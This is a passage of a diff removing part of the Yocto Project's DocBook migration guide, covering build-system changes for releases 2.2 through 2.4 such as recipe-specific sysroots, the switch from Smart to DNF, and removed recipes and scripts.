-                    <filename>grub</filename>:
-                    Split <filename>grub-editenv</filename> into its own
-                    package.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>systemd</filename>:
-                    Split container and vm related units into a new package,
-                    systemd-container.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>util-linux</filename>:
-                    Moved <filename>prlimit</filename> to a separate
-                    <filename>util-linux-prlimit</filename> package.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.2-miscellaneous-changes'>
-        <title>Miscellaneous Changes</title>
-
-        <para>
-            The following miscellaneous changes have occurred:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>package_regex.inc</filename>:
-                    Removed because the definitions
-                    <filename>package_regex.inc</filename> previously contained
-                    have been moved to their respective recipes.
-                    </para></listitem>
-                <listitem><para>
-                    Both <filename>devtool add</filename> and
-                    <filename>recipetool create</filename> now use a fixed
-                    <link linkend='var-SRCREV'><filename>SRCREV</filename></link>
-                    by default when fetching from a Git repository.
-                    You can override this in either case to use
-                    <filename>${</filename><link linkend='var-AUTOREV'><filename>AUTOREV</filename></link><filename>}</filename>
-                    instead by using the <filename>-a</filename> or
-                    <filename>&dash;&dash;autorev</filename> command-line
-                    option
-                    </para></listitem>
-                <listitem><para>
-                    <filename>distcc</filename>:
-                    GTK+ UI is now disabled by default.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>packagegroup-core-tools-testapps</filename>:
-                    Removed Piglit.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>image.bbclass</filename>:
-                    Renamed COMPRESS(ION) to CONVERSION.
-                    This change means that
-                    <filename>COMPRESSIONTYPES</filename>,
-                    <filename>COMPRESS_DEPENDS</filename> and
-                    <filename>COMPRESS_CMD</filename> are deprecated in favor
-                    of <filename>CONVERSIONTYPES</filename>,
-                    <filename>CONVERSION_DEPENDS</filename> and
-                    <filename>CONVERSION_CMD</filename>.
-                    The <filename>COMPRESS*</filename> variable names will
-                    still work in the 2.2 release but metadata that does not
-                    need to be backwards-compatible should be changed to
-                    use the new names as the <filename>COMPRESS*</filename>
-                    ones will be removed in a future release.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gtk-doc</filename>:
-                    A full version of <filename>gtk-doc</filename> is now
-                    made available.
-                    However, some old software might not be capable of using
-                    the current version of <filename>gtk-doc</filename>
-                    to build documentation.
-                    You need to change recipes that build such software so that
-                    they explicitly disable building documentation with
-                    <filename>gtk-doc</filename>.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.3-release'>
-    <title>Moving to the Yocto Project 2.3 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 2.3 Release from the prior release.
-    </para>
-
-    <section id='migration-2.3-recipe-specific-sysroots'>
-        <title>Recipe-specific Sysroots</title>
-
-        <para>
-            The OpenEmbedded build system now uses one sysroot per
-            recipe to resolve long-standing issues with configuration
-            script auto-detection of undeclared dependencies.
-            Consequently, you might find that some of your previously
-            written custom recipes are missing declared dependencies,
-            particularly those dependencies that are incidentally built
-            earlier in a typical build process and thus are already likely
-            to be present in the shared sysroot in previous releases.
-        </para>
-
-        <para>
-            Consider the following:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>Declare Build-Time Dependencies:</emphasis>
-                    Because of this new feature, you must explicitly
-                    declare all build-time dependencies for your recipe.
-                    If you do not declare these dependencies, they are not
-                    populated into the sysroot for the recipe.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Specify Pre-Installation and Post-Installation
-                    Native Tool Dependencies:</emphasis>
-                    You must specifically specify any special native tool
-                    dependencies of <filename>pkg_preinst</filename> and
-                    <filename>pkg_postinst</filename> scripts by using the
-                    <link linkend='var-PACKAGE_WRITE_DEPS'><filename>PACKAGE_WRITE_DEPS</filename></link>
-                    variable.
-                    Specifying these dependencies ensures that these tools
-                    are available if these scripts need to be run on the
-                    build host during the
-                    <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
-                    task.</para>
-
-                    <para>As an example, see the <filename>dbus</filename>
-                    recipe.
-                    You will see that this recipe has a
-                    <filename>pkg_postinst</filename> that calls
-                    <filename>systemctl</filename> if "systemd" is in
-                    <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
-                    In the example,
-                    <filename>systemd-systemctl-native</filename> is added to
-                    <filename>PACKAGE_WRITE_DEPS</filename>, which is also
-                    conditional on "systemd" being in
-                    <filename>DISTRO_FEATURES</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Examine Recipes that Use
-                    <filename>SSTATEPOSTINSTFUNCS</filename>:</emphasis>
-                    You need to examine any recipe that uses
-                    <filename>SSTATEPOSTINSTFUNCS</filename> and determine
-                    steps to take.</para>
-
-                    <para>Functions added to
-                    <filename>SSTATEPOSTINSTFUNCS</filename> are still
-                    called as they were in previous Yocto Project releases.
-                    However, since a separate sysroot is now being populated
-                    for every recipe and if existing functions being called
-                    through <filename>SSTATEPOSTINSTFUNCS</filename> are
-                    doing relocation, then you will need to change these
-                    to use a post-installation script that is installed by a
-                    function added to
-                    <link linkend='var-SYSROOT_PREPROCESS_FUNCS'><filename>SYSROOT_PREPROCESS_FUNCS</filename></link>.
-                    </para>
-
-                    <para>For an example, see the
-                    <filename>pixbufcache</filename> class in
-                    <filename>meta/classes/</filename> in the Yocto Project
-                    <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>.
-                    <note>
-                        The <filename>SSTATEPOSTINSTFUNCS</filename> variable
-                        itself is now deprecated in favor of the
-                        <filename>do_populate_sysroot[postfuncs]</filename>
-                        task.
-                        Consequently, if you do still have any function or
-                        functions that need to be called after the sysroot
-                        component is created for a recipe, then you would be
-                        well advised to take steps to use a post installation
-                        script as described previously.
-                        Taking these steps prepares your code for when
-                        <filename>SSTATEPOSTINSTFUNCS</filename> is
-                        removed in a future Yocto Project release.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Specify the Sysroot when Using Certain
-                    External Scripts:</emphasis>
-                    Because the shared sysroot is now gone, the scripts
-                    <filename>oe-find-native-sysroot</filename> and
-                    <filename>oe-run-native</filename> have been changed such
-                    that you need to specify which recipe's
-                    <link linkend='var-STAGING_DIR_NATIVE'><filename>STAGING_DIR_NATIVE</filename></link>
-                    is used.
-                    </para></listitem>
-            </itemizedlist>
-            <note>
-                You can find more information on how recipe-specific sysroots
-                work in the
-                "<link linkend='ref-classes-staging'><filename>staging.bbclass</filename></link>"
-                section.
-            </note>
-        </para>
-    </section>
-
-    <section id='migration-2.3-path-variable'>
-        <title><filename>PATH</filename> Variable</title>
-
-        <para>
-            Within the environment used to run build tasks, the environment
-            variable <filename>PATH</filename> is now sanitized such that
-            the normal native binary paths
-            (<filename>/bin</filename>, <filename>/sbin</filename>,
-            <filename>/usr/bin</filename> and so forth) are
-            removed and a directory containing symbolic links linking only
-            to the binaries from the host mentioned in the
-            <link linkend='var-HOSTTOOLS'><filename>HOSTTOOLS</filename></link>
-            and
-            <link linkend='var-HOSTTOOLS_NONFATAL'><filename>HOSTTOOLS_NONFATAL</filename></link>
-            variables is added to <filename>PATH</filename>.
-        </para>
-
-        <para>
-            Consequently, any native binaries provided by the host that you
-            need to call needs to be in one of these two variables at
-            the configuration level.
-        </para>
-
-        <para>
-            Alternatively, you can add a native recipe (i.e.
-            <filename>-native</filename>) that provides the
-            binary to the recipe's
-            <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
-            value.
-            <note>
-                <filename>PATH</filename> is not sanitized in the same way
-                within <filename>devshell</filename>.
-                If it were, you would have difficulty running host tools for
-                development and debugging within the shell.
-            </note>
-        </para>
-    </section>
-
-    <section id='migration-2.3-scripts'>
-        <title>Changes to Scripts</title>
-
-        <para>
-            The following changes to scripts took place:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>oe-find-native-sysroot</filename>:</emphasis>
-                    The usage for the
-                    <filename>oe-find-native-sysroot</filename> script has
-                    changed to the following:
-                    <literallayout class='monospaced'>
-     $ . oe-find-native-sysroot <replaceable>recipe</replaceable>
-                    </literallayout>
-                    You must now supply a recipe for
-                    <replaceable>recipe</replaceable> as part of the command.
-                    Prior to the Yocto Project &DISTRO; release, it was not
-                    necessary to provide the script with the command.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>oe-run-native</filename>:</emphasis>
-                    The usage for the
-                    <filename>oe-run-native</filename> script has changed
-                    to the following:
-                    <literallayout class='monospaced'>
-     $ oe-run-native <replaceable>native_recipe</replaceable> <replaceable>tool</replaceable>
-                    </literallayout>
-                    You must supply the name of the native recipe and the tool
-                    you want to run as part of the command.
-                    Prior to the Yocto Project &DISTRO; release, it was not
-                    necessary to provide the native recipe with the command.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>cleanup-workdir</filename>:</emphasis>
-                    The <filename>cleanup-workdir</filename> script has been
-                    removed because the script was found to be deleting
-                    files it should not have, which lead to broken build
-                    trees.
-                    Rather than trying to delete portions of
-                    <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
-                    and getting it wrong, it is recommended that you
-                    delete <filename>TMPDIR</filename> and have it restored
-                    from shared state (sstate) on subsequent builds.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>wipe-sysroot</filename>:</emphasis>
-                    The <filename>wipe-sysroot</filename> script has been
-                    removed as it is no longer needed with recipe-specific
-                    sysroots.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.3-functions'>
-        <title>Changes to Functions</title>
-
-        <para>
-            The previously deprecated
-            <filename>bb.data.getVar()</filename>,
-            <filename>bb.data.setVar()</filename>, and
-            related functions have been removed in favor of
-            <filename>d.getVar()</filename>,
-            <filename>d.setVar()</filename>, and so forth.
-        </para>
-
-        <para>
-            You need to fix any references to these old functions.
-        </para>
-    </section>
-
-    <section id='migration-2.3-bitbake-changes'>
-        <title>BitBake Changes</title>
-
-        <para>
-            The following changes took place for BitBake:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>BitBake's Graphical Dependency Explorer UI Replaced:</emphasis>
-                    BitBake's graphical dependency explorer UI
-                    <filename>depexp</filename> was replaced by
-                    <filename>taskexp</filename> ("Task Explorer"), which
-                    provides a graphical way of exploring the
-                    <filename>task-depends.dot</filename> file.
-                    The data presented by Task Explorer is much more
-                    accurate than the data that was presented by
-                    <filename>depexp</filename>.
-                    Being able to visualize the data is an often requested
-                    feature as standard <filename>*.dot</filename> file
-                    viewers cannot usual cope with the size of
-                    the <filename>task-depends.dot</filename> file.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>BitBake "-g" Output Changes:</emphasis>
-                    The <filename>package-depends.dot</filename> and
-                    <filename>pn-depends.dot</filename> files as previously
-                    generated using the <filename>bitbake -g</filename> command
-                    have been removed.
-                    A <filename>recipe-depends.dot</filename> file
-                    is now generated as a collapsed version of
-                    <filename>task-depends.dot</filename> instead.
-                    </para>
-
-                    <para>The reason for this change is because
-                    <filename>package-depends.dot</filename> and
-                    <filename>pn-depends.dot</filename> largely date back
-                    to a time before task-based execution and do not take
-                    into account task-level dependencies between recipes,
-                    which could be misleading.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Mirror Variable Splitting Changes:</emphasis>
-                    Mirror variables including
-                    <link linkend='var-MIRRORS'><filename>MIRRORS</filename></link>,
-                    <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>,
-                    and
-                    <link linkend='var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></link>
-                    can now separate values entirely with spaces.
-                    Consequently, you no longer need "\\n".
-                    BitBake looks for pairs of values, which simplifies usage.
-                    There should be no change required to existing mirror
-                    variable values themselves.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>The Subversion (SVN) Fetcher Uses an "ssh" Parameter and Not an "rsh" Parameter:</emphasis>
-                    The SVN fetcher now takes an "ssh" parameter instead of an
-                    "rsh" parameter.
-                    This new optional parameter is used when the "protocol"
-                    parameter is set to "svn+ssh".
-                    You can only use the new parameter to specify the
-                    <filename>ssh</filename> program used by SVN.
-                    The SVN fetcher passes the new parameter through the
-                    <filename>SVN_SSH</filename> environment variable during
-                    the
-                    <link linkend='ref-tasks-fetch'><filename>do_fetch</filename></link>
-                    task.</para>
-
-                    <para>See the
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#svn-fetcher'>Subversion (SVN) Fetcher (svn://)</ulink>"
-                    section in the BitBake User Manual for additional
-                    information.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>BB_SETSCENE_VERIFY_FUNCTION</filename>
-                    and <filename>BB_SETSCENE_VERIFY_FUNCTION2</filename>
-                    Removed:</emphasis>
-                    Because the mechanism they were part of is no longer
-                    necessary with recipe-specific sysroots, the
-                    <filename>BB_SETSCENE_VERIFY_FUNCTION</filename> and
-                    <filename>BB_SETSCENE_VERIFY_FUNCTION2</filename>
-                    variables have been removed.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.3-absolute-symlinks'>
-        <title>Absolute Symbolic Links</title>
-
-        <para>
-            Absolute symbolic links (symlinks) within staged files are no
-            longer permitted and now trigger an error.
-            Any explicit creation of symlinks can use the
-            <filename>lnr</filename> script, which is a replacement for
-            <filename>ln -r</filename>.
-        </para>
-
-        <para>
-            If the build scripts in the software that the recipe is building
-            are creating a number of absolute symlinks that need to be
-            corrected, you can inherit
-            <filename>relative_symlinks</filename> within the recipe to turn
-            those absolute symlinks into relative symlinks.
-        </para>
-    </section>
-
-    <section id='migration-2.3-gplv2-and-gplv3-moves'>
-        <title>GPLv2 Versions of GPLv3 Recipes Moved</title>
-
-        <para>
-            Older GPLv2 versions of GPLv3 recipes have moved to a
-            separate <filename>meta-gplv2</filename> layer.
-        </para>
-
-        <para>
-            If you use
-            <link linkend='var-INCOMPATIBLE_LICENSE'><filename>INCOMPATIBLE_LICENSE</filename></link>
-            to exclude GPLv3 or set
-            <link linkend='var-PREFERRED_VERSION'><filename>PREFERRED_VERSION</filename></link>
-            to substitute a GPLv2 version of a GPLv3 recipe, then you must add
-            the <filename>meta-gplv2</filename> layer to your configuration.
-            <note>
-                You can find <filename>meta-gplv2</filename> layer in the
-                OpenEmbedded layer index at
-                <ulink url='https://layers.openembedded.org/layerindex/branch/master/layer/meta-gplv2/'></ulink>.
-            </note>
-        </para>
-
-        <para>
-            These relocated GPLv2 recipes do not receive the same level of
-            maintenance as other core recipes.
-            The recipes do not get security fixes and upstream no longer
-            maintains them.
-            In fact, the upstream community is actively hostile towards people
-            that use the old versions of the recipes.
-            Moving these recipes into a separate layer both makes the different
-            needs of the recipes clearer and clearly identifies the number of
-            these recipes.
-            <note>
-                The long-term solution might be to move to BSD-licensed
-                replacements of the GPLv3 components for those that need to
-                exclude GPLv3-licensed components from the target system.
-                This solution will be investigated for future Yocto
-                Project releases.
-            </note>
-        </para>
-    </section>
-
-    <section id='migration-2.3-package-management-changes'>
-        <title>Package Management Changes</title>
-
-        <para>
-            The following package management changes took place:
-            <itemizedlist>
-                <listitem><para>
-                    Smart package manager is replaced by DNF package manager.
-                    Smart has become unmaintained upstream, is not ported
-                    to Python 3.x.
-                    Consequently, Smart needed to be replaced.
-                    DNF is the only feasible candidate.</para>
-                    <para>The change in functionality is that the on-target
-                    runtime package management from remote package feeds is
-                    now done with a different tool that has a
-                    different set of command-line options.
-                    If you have scripts that call the
-                    tool directly, or use its API, they need to be fixed.</para>
-                    <para>For more information, see the
-                    <ulink url='http://dnf.readthedocs.io/en/latest/'>DNF Documentation</ulink>.
-                    </para></listitem>
-                <listitem><para>
-                    Rpm 5.x is replaced with Rpm 4.x.
-                    This is done for two major reasons:
-                    <itemizedlist>
-                        <listitem><para>
-                            DNF is API-incompatible with Rpm 5.x and porting
-                            it and maintaining the port is non-trivial.
-                            </para></listitem>
-                        <listitem><para>
-                            Rpm 5.x itself has limited maintenance upstream,
-                            and the Yocto Project is one of the very few
-                            remaining users.
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    Berkeley DB 6.x is removed and Berkeley DB 5.x becomes
-                    the default:
-                    <itemizedlist>
-                        <listitem><para>
-                            Version 6.x of Berkeley DB has largely been
-                            rejected by the open source community due to its
-                            AGPLv3 license.
-                            As a result, most mainstream open source projects
-                            that require DB are still developed and tested with
-                            DB 5.x.
-                            </para></listitem>
-                        <listitem><para>
-                            In OE-core, the only thing that was requiring
-                            DB 6.x was Rpm 5.x.
-                            Thus, no reason exists to continue carrying DB 6.x
-                            in OE-core.
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>createrepo</filename> is replaced with
-                    <filename>createrepo_c</filename>.</para>
-                    <para><filename>createrepo_c</filename> is the current
-                    incarnation of the tool that generates remote repository
-                    metadata.
-                    It is written in C as compared to
-                    <filename>createrepo</filename>, which is written in
-                    Python.
-                    <filename>createrepo_c</filename> is faster and is
-                    maintained.
-                    </para></listitem>
-                <listitem><para>
-                    Architecture-independent RPM packages are "noarch"
-                    instead of "all".</para>
-                    <para>This change was made because too many places in
-                    DNF/RPM4 stack already make that assumption.
-                    Only the filenames and the architecture tag has changed.
-                    Nothing else has changed in OE-core system, particularly
-                    in the
-                    <link linkend='ref-classes-allarch'><filename>allarch.bbclass</filename></link>
-                    class.
-                    </para></listitem>
-                <listitem><para>
-                    Signing of remote package feeds using
-                    <filename>PACKAGE_FEED_SIGN</filename>
-                    is not currently supported.
-                    This issue will be fully addressed in a future
-                    Yocto Project release.
-                    See <ulink url='https://bugzilla.yoctoproject.org/show_bug.cgi?id=11209'>defect 11209</ulink>
-                    for more information on a solution to package feed
-                    signing with RPM in the Yocto Project 2.3 release.
-                    </para></listitem>
-                <listitem><para>
-                    OPKG now uses the libsolv backend for resolving package
-                    dependencies by default.
-                    This is vastly superior to OPKG's internal ad-hoc solver
-                    that was previously used.
-                    This change does have a small impact on disk (around
-                    500 KB) and memory footprint.
-                    <note>
-                        For further details on this change, see the
-                        <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?
-id=f4d4f99cfbc2396e49c1613a7d237b9e57f06f81'>commit message</ulink>.
-                    </note>
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.3-removed-recipes'>
-        <title>Removed Recipes</title>
-
-        <para>
-            The following recipes have been removed:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>linux-yocto 4.8:</filename></emphasis>
-                    Version 4.8 has been removed.
-                    Versions 4.1 (LTSI), 4.4 (LTS), 4.9 (LTS/LTSI) and 4.10
-                    are now present.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>python-smartpm:</filename></emphasis>
-                    Functionally replaced by <filename>dnf</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>createrepo:</filename></emphasis>
-                    Replaced by the <filename>createrepo-c</filename> recipe.
-                    </para></listitem>
-                 <listitem><para>
-                    <emphasis><filename>rpmresolve:</filename></emphasis>
-                    No longer needed with the move to RPM 4 as RPM itself is
-                    used instead.
-                    </para></listitem>
-                 <listitem><para>
-                    <emphasis><filename>gstreamer:</filename></emphasis>
-                    Removed the GStreamer Git version recipes as they have
-                    been stale.
-                    <filename>1.10.</filename><replaceable>x</replaceable>
-                    recipes are still present.
-                    </para></listitem>
-                 <listitem><para>
-                    <emphasis><filename>alsa-conf-base:</filename></emphasis>
-                    Merged into <filename>alsa-conf</filename> since
-                    <filename>libasound</filename> depended on both.
-                    Essentially, no way existed to install only one of these.
-                    </para></listitem>
-                 <listitem><para>
-                    <emphasis><filename>tremor:</filename></emphasis>
-                    Moved to <filename>meta-multimedia</filename>.
-                    Fixed-integer Vorbis decoding is not
-                    needed by current hardware.
-                    Thus, GStreamer's ivorbis plugin has been disabled
-                    by default eliminating the need for the
-                    <filename>tremor</filename> recipe in
-                    <link linkend='oe-core'>OE-Core</link>.
-                    </para></listitem>
-                 <listitem><para>
-                    <emphasis><filename>gummiboot:</filename></emphasis>
-                    Replaced by <filename>systemd-boot</filename>.
-                    </para></listitem>
-           </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.3-wic-changes'>
-        <title>Wic Changes</title>
-
-        <para>
-            The following changes have been made to Wic:
-            <note>
-                For more information on Wic, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-partitioned-images-using-wic'>Creating Partitioned Images Using Wic</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-            </note>
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>Default Output Directory Changed:</emphasis>
-                    Wic's default output directory is now the current directory
-                    by default instead of the unusual
-                    <filename>/var/tmp/wic</filename>.</para>
-
-                    <para>The "-o" and "--outdir" options remain unchanged
-                    and are used to specify your preferred output directory
-                    if you do not want to use the default directory.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>fsimage Plug-in Removed:</emphasis>
-                    The Wic fsimage plugin has been removed as it duplicates
-                    functionality of the rawcopy plugin.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.3-qa-changes'>
-        <title>QA Changes</title>
-
-        <para>
-            The following QA checks have changed:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>unsafe-references-in-binaries</filename>:</emphasis>
-                    The <filename>unsafe-references-in-binaries</filename>
-                    QA check, which was disabled by default, has now been
-                    removed.
-                    This check was intended to detect binaries in
-                    <filename>/bin</filename> that link to libraries in
-                    <filename>/usr/lib</filename> and have the case where
-                    the user has <filename>/usr</filename> on a separate
-                    filesystem to <filename>/</filename>.</para>
-
-                    <para>The removed QA check was buggy.
-                    Additionally, <filename>/usr</filename> residing on a
-                    separate partition from <filename>/</filename> is now
-                    a rare configuration.
-                    Consequently,
-                    <filename>unsafe-references-in-binaries</filename> was
-                    removed.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>file-rdeps</filename>:</emphasis>
-                    The <filename>file-rdeps</filename> QA check is now an
-                    error by default instead of a warning.
-                    Because it is an error instead of a warning, you need to
-                    address missing runtime dependencies.</para>
-
-                    <para>For additional information, see the
-                    <link linkend='ref-classes-insane'><filename>insane</filename></link>
-                    class and the
-                    "<link linkend='qa-errors-and-warnings'>Errors and Warnings</link>"
-                    section.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.3-miscellaneous-changes'>
-        <title>Miscellaneous Changes</title>
-
-        <para>
-            The following miscellaneous changes have occurred:
-            <itemizedlist>
-                <listitem><para>
-                    In this release, a number of recipes have been changed to
-                    ignore the <filename>largefile</filename>
-                    <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
-                    item, enabling large file support unconditionally.
-                    This feature has always been enabled by default.
-                    Disabling the feature has not been widely tested.
-                    <note>
-                        Future releases of the Yocto Project will remove
-                        entirely the ability to disable the
-                        <filename>largefile</filename> feature,
-                        which would make it unconditionally enabled everywhere.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    If the
-                    <link linkend='var-DISTRO_VERSION'><filename>DISTRO_VERSION</filename></link>
-                    value contains the value of the
-                    <link linkend='var-DATE'><filename>DATE</filename></link>
-                    variable, which is the default between Poky releases,
-                    the <filename>DATE</filename> value is explicitly excluded
-                    from <filename>/etc/issue</filename> and
-                    <filename>/etc/issue.net</filename>, which is displayed at
-                    the login prompt, in order to avoid conflicts with
-                    Multilib enabled.
-                    Regardless, the <filename>DATE</filename> value is
-                    inaccurate if the <filename>base-files</filename>
-                    recipe is restored from shared state (sstate) rather
-                    than rebuilt.</para>
-
-                    <para>If you need the build date recorded in
-                    <filename>/etc/issue*</filename> or anywhere else in your
-                    image, a better method is to define a post-processing
-                    function to do it and have the function called from
-                    <link linkend='var-ROOTFS_POSTPROCESS_COMMAND'><filename>ROOTFS_POSTPROCESS_COMMAND</filename></link>.
-                    Doing so ensures the value is always up-to-date with the
-                    created image.
-                    </para></listitem>
-                <listitem><para>
-                    Dropbear's <filename>init</filename> script now disables
-                    DSA host keys by default.
-                    This change is in line with the systemd service
-                    file, which supports RSA keys only, and with recent
-                    versions of OpenSSH, which deprecates DSA host keys.
-                    </para></listitem>
-                <listitem><para>
-                    The
-                    <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
-                    class now correctly uses tabs as separators between all
-                    columns in <filename>installed-package-sizes.txt</filename>
-                    in order to aid import into other tools.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>USE_LDCONFIG</filename> variable has been
-                    replaced with the "ldconfig"
-                    <filename>DISTRO_FEATURES</filename> feature.
-                    Distributions that previously set:
-                    <literallayout class='monospaced'>
-     USE_LDCONFIG = "0"
-                    </literallayout>
-                    should now instead use the following:
-                    <literallayout class='monospaced'>
-     DISTRO_FEATURES_BACKFILL_CONSIDERED_append = " ldconfig"
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    The default value of
-                    <link linkend='var-COPYLEFT_LICENSE_INCLUDE'><filename>COPYLEFT_LICENSE_INCLUDE</filename></link>
-                    now includes all versions of AGPL licenses in addition
-                    to GPL and LGPL.
-                    <note>
-                        The default list is not intended to be guaranteed
-                        as a complete safe list.
-                        You should seek legal advice based on what you are
-                        distributing if you are unsure.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    Kernel module packages are now suffixed with the kernel
-                    version in order to allow module packages from multiple
-                    kernel versions to co-exist on a target system.
-                    If you wish to return to the previous naming scheme
-                    that does not include the version suffix, use the
-                    following:
-                    <literallayout class='monospaced'>
-     KERNEL_MODULE_PACKAGE_SUFFIX to ""
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    Removal of <filename>libtool</filename>
-                    <filename>*.la</filename> files is now enabled by default.
-                    The <filename>*.la</filename> files are not actually
-                    needed on Linux and relocating them is an unnecessary
-                    burden.</para>
-
-                    <para>If you need to preserve these
-                    <filename>.la</filename> files (e.g. in a custom
-                    distribution), you must change
-                    <link linkend='var-INHERIT_DISTRO'><filename>INHERIT_DISTRO</filename></link>
-                    such that "remove-libtool" is not included in the value.
-                    </para></listitem>
-                <listitem><para>
-                    Extensible SDKs built for GCC 5+ now refuse to install on a
-                    distribution where the host GCC version is 4.8 or 4.9.
-                    This change resulted from the fact that the installation
-                    is known to fail due to the way the
-                    <filename>uninative</filename> shared state (sstate)
-                    package is built.
-                    See the
-                    <link linkend='ref-classes-uninative'><filename>uninative</filename></link>
-                    class for additional information.
-                    </para></listitem>
-                <listitem><para>
-                    All native and nativesdk recipes now use a separate
-                    <filename>DISTRO_FEATURES</filename> value instead of
-                    sharing the value used by recipes for the target, in order
-                    to avoid unnecessary rebuilds.</para>
-
-                    <para>The <filename>DISTRO_FEATURES</filename> for
-                    <filename>native</filename> recipes is
-                    <link linkend='var-DISTRO_FEATURES_NATIVE'><filename>DISTRO_FEATURES_NATIVE</filename></link>
-                    added to an intersection of
-                    <filename>DISTRO_FEATURES</filename> and
-                    <link linkend='var-DISTRO_FEATURES_FILTER_NATIVE'><filename>DISTRO_FEATURES_FILTER_NATIVE</filename></link>.
-                    </para>
-
-                    <para>For nativesdk recipes, the
-                    corresponding variables are
-                    <link linkend='var-DISTRO_FEATURES_NATIVESDK'><filename>DISTRO_FEATURES_NATIVESDK</filename></link>
-                    and
-                    <link linkend='var-DISTRO_FEATURES_FILTER_NATIVESDK'><filename>DISTRO_FEATURES_FILTER_NATIVESDK</filename></link>.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>FILESDIR</filename>
-                    variable, which was previously deprecated and rarely used,
-                    has now been removed.
-                    You should change any recipes that set
-                    <filename>FILESDIR</filename> to set
-                    <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>
-                    instead.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>MULTIMACH_HOST_SYS</filename>
-                    variable has been removed as it is no longer needed
-                    with recipe-specific sysroots.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.4-release'>
-    <title>Moving to the Yocto Project 2.4 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 2.4 Release from the prior release.
-    </para>
-
-    <section id='migration-2.4-memory-resident-mode'>
-        <title>Memory Resident Mode</title>
-
-        <para>
-            A persistent mode is now available in BitBake's default operation,
-            replacing its previous "memory resident mode" (i.e.
-            <filename>oe-init-build-env-memres</filename>).
-            Now you only need to set
-            <link linkend='var-BB_SERVER_TIMEOUT'><filename>BB_SERVER_TIMEOUT</filename></link>
-            to a timeout (in seconds) and BitBake's server stays resident for
-            that amount of time between invocations.
-            The <filename>oe-init-build-env-memres</filename> script has been
-            removed since a separate environment setup script is no longer
-            needed.
-        </para>
-    </section>
-
-    <section id='migration-2.4-packaging-changes'>
-        <title>Packaging Changes</title>
-
-        <para>
-            This section provides information about packaging changes that have
-            occurred:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>python3</filename> Changes:</emphasis>
-                    <itemizedlist>
-                        <listitem><para>
-                            The main "python3" package now brings in all of the
-                            standard Python 3 distribution rather than a subset.
-                            This behavior matches what is expected based on
-                            traditional Linux distributions.
-                            If you wish to install a subset of Python 3, specify
-                            <filename>python-core</filename> plus one or more of
-                            the individual packages that are still produced.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis><filename>python3</filename>:</emphasis>
-                            The <filename>bz2.py</filename>,
-                            <filename>lzma.py</filename>, and
-                            <filename>_compression.py</filename> scripts have
-                            been moved from the
-                            <filename>python3-misc</filename> package to
-                            the <filename>python3-compression</filename> package.
-                            </para></listitem>
-                    </itemizedlist>
